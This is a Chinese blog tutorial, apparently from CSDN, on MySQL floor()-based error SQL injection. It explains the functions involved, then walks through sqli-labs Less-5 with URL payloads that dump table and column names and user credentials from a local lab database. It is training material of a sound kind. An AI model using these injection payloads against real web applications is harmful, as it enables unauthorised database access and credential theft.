Floor报错注入理论及实战

已于 2023-11-20 20:10:50 修改
阅读量265 收藏
点赞数 1
分类专栏: 网络安全 文章标签: 数据库 sql mysql
于 2023-11-08 08:56:59 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45988710/article/details/134280636
版权

rand()函数:随机返回0-1之间的小数

floor()函数:小数向下取证书。向上取整数ceiling()

concat_ws函数:将括号内数据用第一个字段连接起来

group by子句:分组语句,常用语结合统计函数,根据一个或多个列,对结果集进行分组

as:别名

count()函数:汇总统计数量

limit:这里用于显示指定行数

?id=0' union select 1,count(*),concat_ws('-',(select concat('~',id,username,':',password) from users limit0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

rand函数()

返回0-1之间的随机一个值

select rand() *2 #计算结果在0-2之间

select rand() from users;#根据users的行数随机显示结果

floor()函数

小数向下取整数

concat_ws()函数

将括号内数据用第一个字段连接起来

select concat_ws('-',(select database()),floor(rand()*2));

select concat_ws('-',(select database()),floor(rand()*2)) from users;

有多少用户就计算多少次,且结果随机

as别名,group by分组

select concat_ws('-',(select database()),floor(rand()*2)) as a from users group by a;

分组之前

分组之后

count()函数

汇总统计数量

select count(*),concat_ws('-',(select database()),floor(rand()*2)) as a from users group by a;

报错里面出现了dvwa-1,可以利用这个地方查询信息

select floor(rand())*2 from users;根据表users的行数随机显示0或1

select floor(rand(0)*2) from users;计算不再随机,而是按一定顺序排列

select floor(rand(1)*2) from users;

select count(*),concat_ws('-',(select database())),floor(rand(0)*2) as a from users group by a; #固定报错

select count(*),concat_ws('_',(select database()),floor(rand(1)*2)) as a from users goup by a;#固定不会报错

为什么写成0就会报错?

把count(*)去掉不再报错,说明是在统计时出现了错误

select count(*),concat_ws('-',(select database()),floor(rand(0)*2)) as a from users group by a;

select count(*),concat_ws('_',(select database()),floor(rand(0)*2)) as a from users group by a;

作用是让rand函数产生足够多次数的计算,一般使用行数比较多的默认数据表information_schema.tables

union select count(*),concat_ws('-',select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from users group by a;#floor报错注入 一次展现的字符串有64位。

本次注入的是sqli-labs的第五关

1.判断是字符型还是数字型

丢一个单引号,查看报错提示,可以看到是一个单引号闭合方式,加上单引号后面跟上--+注释掉。页面可以正常显示。

2.判断列数,使用order by函数的二分法方式

根据报错可以看出列数是3列

3.查询是否具有内容回显位置

无任何回显,无法根据页面正常显示的内容查询出我们所需要的信息

4.使用floor报错提示进行查询

开始构造SQL语句

union select 1,count(*),concat_ws('-',(database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

查询出数据库信息

现在已知数据库查询数据表,构造SQL语句

union select 1,count(*),concat_ws('-',(select group_concat(table_name) from information_schema.tables where table_schema=database()),floor(rand(0)*2)) as a from information_schema.tables group by a --+

查询出数据表

已知数据表查询所有字段,构造SQL语句

union select 1,count(*),concat_ws('-',(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),floor(rand(0)*2)) as a from information_schema.tables group by a --+

已知字段,查询字段内容

union select 1,count(*),concat_ws('-',(select group_concat(username,password) from security.users),floor(rand(0)*2)) as a from information_schema.tables group by a --+

使用group_concat无法正常显示,尝试使用concat函数

http://sqli-labs:8088/Less-5/?id=1' union select 1,count(*),concat_ws('-',(select concat(username,':',password) from security.users limit 0,1),floor(rand(0)*2)) as a from information_schema.tables group by a --+

Subquery returns more than 1 row#查询返回一行以上,解决使用limit函数,从第0行开始,反馈1行

查询成功!

ICT大龙
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
【web安全】——floor报错注入
Demo不是emo的博客
01-06 1万+
floor报错注入深度剖析
Floor报错注入原理解析心得
qq_27130557的博客
10-22 3028
相关函数 1.floor() 向下取整。 即取不大于x的最大整数。取按照数轴上最接近要求值的左边值。 2.rand(x) 随机产生一个0-1之间的浮点数 当指定参数x之后,会生成固定的伪随机序列。即固定了参数,之后每次生成的值都是一样的,故称之为固定的伪随机数字(产生的数字都是可预知的) rand(0)*2 产生一个伪随机序列(结果已知),因为*2,所以返回结果只能是0或1 3.count(*) 返回值的条目,与count()的区别在于其不排除NULL,c..
Mysql报错注入floor报错详解
最新发布
qq_64395221的博客
05-21 877
​security1security1security1。
sql注入中的floor报错注入原理详解
哦 卷!
10-25 2446
floor()报错注入的原因是group by在向统计表插入数据时,由于rand()多次计算导致插入统计表时主键重复,从而报错。又因为报错前concat_ws()中的SQL语句或函数被执行,所以该语句报错且被抛出的主键是SQL语句或函数执行后的结果。
最常见的SQL报错注入函数(floor、updatexml、extractvalue)及payload总结
Welcome To Myon'Blog !
12-24 4820
extractvalue() 能查询字符串的最大长度为 32,如果我们想要的结果超过 32,就要用 substring() 函数截取或 limit 分页,一次查看最多 32 位。其实有时候我们可以使用group_concat()将所以查询内容列出,但是要取决于题目具体环境,如果无法使用,则使用limit语句来限制查询结果的列数,逐条查询。但是这里回显要么存在,要么无回显,因此无法使用联合查询注入,而且也不存在回显为真或者假两种情况,排除掉盲注,那么这关需要使用的是报错注入
基于联合查询的字符型GET注入
Z_l123的博客
02-16 1092
1.访问SQLi-Labs网站 访问Less-1,并根据网页提示给定一个GET参数 http://127.0.0.1/sqli-labs/Less-1/?id=1 2.寻找注入点 分别使用以下3条payload寻找注入点及判断注入点的类型: http://127.0.0.1/sqli-labs/Less-1/?id=1' 运行后报错! http://127.0.0.1/sqli-labs/Less-1/?id=1' and '1'='1 运行后正常显示! http:/.
第六节 GET报错注入-01
09-15
【第六节 GET报错注入-01】是关于Web安全中的一个常见攻击手段——报错注入的讲解。报错注入主要是利用应用程序在处理查询时,因错误反馈信息过于详细而暴露敏感数据的一种方法。通常,它涉及到SQL查询的嵌套结构,...
Mysql报错注入详解.docx
11-20
MySQL 报错注入是一种安全漏洞利用技术,当应用程序在处理用户输入时未能充分过滤或转义SQL语句,导致数据库因错误语法而返回错误信息,攻击者可以通过分析这些错误信息来获取敏感信息或执行恶意操作。以下是对MySQL...
035-关于floor()报错注入,你真的懂了吗?.pdf
09-20
035-关于floor()报错注入,你真的懂了吗?.pdf
sql注入 自学笔记 报错注入 二阶注入 布尔时间盲注 基于sqli-labs
02-19
floor()函数可以与group by和rand()函数联用来进行报错注入。报错原理:floor()函数与group by联用时,如果临时表中没有该主键,则在插入前会计算一次rand(),然后再由group by将计算出来的主键直接插入到临时表格中...
了解floor函数注入
贝隆的博客
02-05 384
floor函数注入
SQL注入之floor报错注入以及各个部分详细分析 + iwebsec 实例分析 + updatexml() 报错 + extractvalue() 报错
m0_50917178的博客
12-09 4071
文章目录前言一、什么是floor报错注入二、利用iwebsec模拟实际注入过程三、updatexml()和extractvalue()报错注入四、问题 前言 本文为作者的学习笔记,主要介绍了floor注入原理,利用注入代码(payload)分析每个部分的作用以此来解释floor注入的原理。在解释过程中会使用phpstudy搭建的MySQL环境,并且利用iwebsec漏洞库来实践。最后顺带介绍updatexml和extractvalue报错注入。 提示:以下是本篇文章正文内容,下面案例可供参考 一、什么是
sql报错注入floor 函数报错:主键重复
m0_63521991的博客
02-19 1269
利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。(3)查询虚拟表,发现0的键值不存在,则插入新的键值的时候floor(rand(0)*2)会被再计算一次,结果为1(第二次计算),插入虚表,这时第一条记录查询完毕,如下图: 0 1 1 0 1 1。也可以称之为伪随机(产生的数据都是可预知的)。
mysqlfloor的用法_Mysql报错注入floor报错详解
weixin_32757449的博客
01-19 6843
?利用 select count(*),(floor(rand(0)*2))x from table group by x,导致数据库报错,通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,实现将注入结果与报错信息回显的注入方式。基本的查询 select 不必多说,剩下的几个关键字有 count 、group by 、floorrand。二、关键函数说明?1.ran...
floor()报错注入
热门推荐
超人学飞的日子
06-11 1万+
floor()报错注入准确地说应该是floor,count,group by冲突报错是当这三个函数在特定情况一起使用产生的错误。首先看经典的floor注入语句:and select 1 from (select count(*),concat(database(),floor(rand(0)*2))x from information_schema.tables group by x)a)第一眼看...
SQL注入报错注入floor()报错注入原理分析
黄乔国PHP
02-27 2373
对于extractValue和updateXML函数来说比较好理解,就不做解释了,这里只对floor函数的报错注入进行讲解。首先我们先要知道floor()报错注入的形式:这个相对固定的语句格式,导致的数据库报错。实际利用中通过 concat 函数,连接注入语句与 floor(rand(0)*2)函数,就实现了注入结果与报错信息回显的注入方式。所以我们如果想要理解floor()报错注入的原理,我们首先需要明白:rand(),floor(),group by, count()这几个的意思。
SQL注入-报错注入
m0_72125469的博客
11-24 771
SQL注入系列-报错注入
Mysql报错注入floor()
teep0的博客
01-08 436
这个sql语句只是为了让整个sql的逻辑不出错,因为select 1 无论from 哪个的集合的结果都是1.即And (slect 1 from (sql)a)=And 1.floor报错注入也可以称为group by 报错注入,也可以归属为:主键报错注入。以上两条注入语句是一样的,其中的别名a和x可以是同名。报错的原因是因为插入重复插入虚拟表主键,数据库会报错。
[理论-学习]Web安全-SQL注入-基础06
3hex的博客
08-18 202
声明: 由于笔者能力有限,难免出现各种错误和漏洞。全文仅作为个人笔记,仅供参考。 笔记内容来源于各类网课。 环境: 以Sqli-labs中的less14为实验环境。 一、双注入使用的函数 1. rand函数 产生一个0-1直接的随机数。(不含1) rand()*2时,产生一个0-2直接按的随机数(不含2). 2. floor()函数 对一个数向下取整,即只取数字的整数部分(不进行四舍五入)。 3. floor()和rand() floor(rand()*2)将随机产...
报错注入floor()
05-30
如果您遇到了“报错注入”,且报错信息与floor()函数有关,可能是因为您在SQL查询语句中使用了floor()函数,并且注入的语句中使用了错误的参数类型或值,导致SQL语句无法正确执行。这种情况下,攻击者通常会在注入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

ICT大龙

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值